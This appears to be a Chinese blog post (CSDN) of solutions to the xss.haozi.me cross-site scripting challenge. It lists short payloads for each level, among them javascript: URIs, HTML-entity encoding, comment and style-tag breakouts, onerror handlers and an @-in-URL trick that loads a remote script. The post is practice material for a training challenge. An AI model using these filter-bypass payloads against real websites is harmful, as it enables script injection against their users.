xss.haozi挑战

本文介绍了多种XSS跨站脚本攻击的实现方式,包括模板字符串、URL编码、换行利用、事件触发等,详细解析了如何通过javascript:协议、特殊字符编码、注释等方式插入恶意脚本,提升网络安全意识。
摘要由CSDN通过智能技术生成

0x03(模板字符串)
<a href=javascript:alert `1`>1</a>

0x04(url)
<a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;">1</a>

0x05(--!>)
--!><script>alert(1)</script>

0x06(换行)
onclick
=alert(1)

0x07(on事件)
<img src=x οnerrοr=alert(1)> 

0x08(//用法)
</style//><script>alert(1)</script>

0x09(on事件)
https://www.segmentfault.com" οnerrοr=alert(1)

0x0A(@的用法相当于访问https://xss.haozi.me/j.js)
https://www.segmentfault.com@xss.haozi.me/j.js

0x0B(url)
<a href=javascript:&#97

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值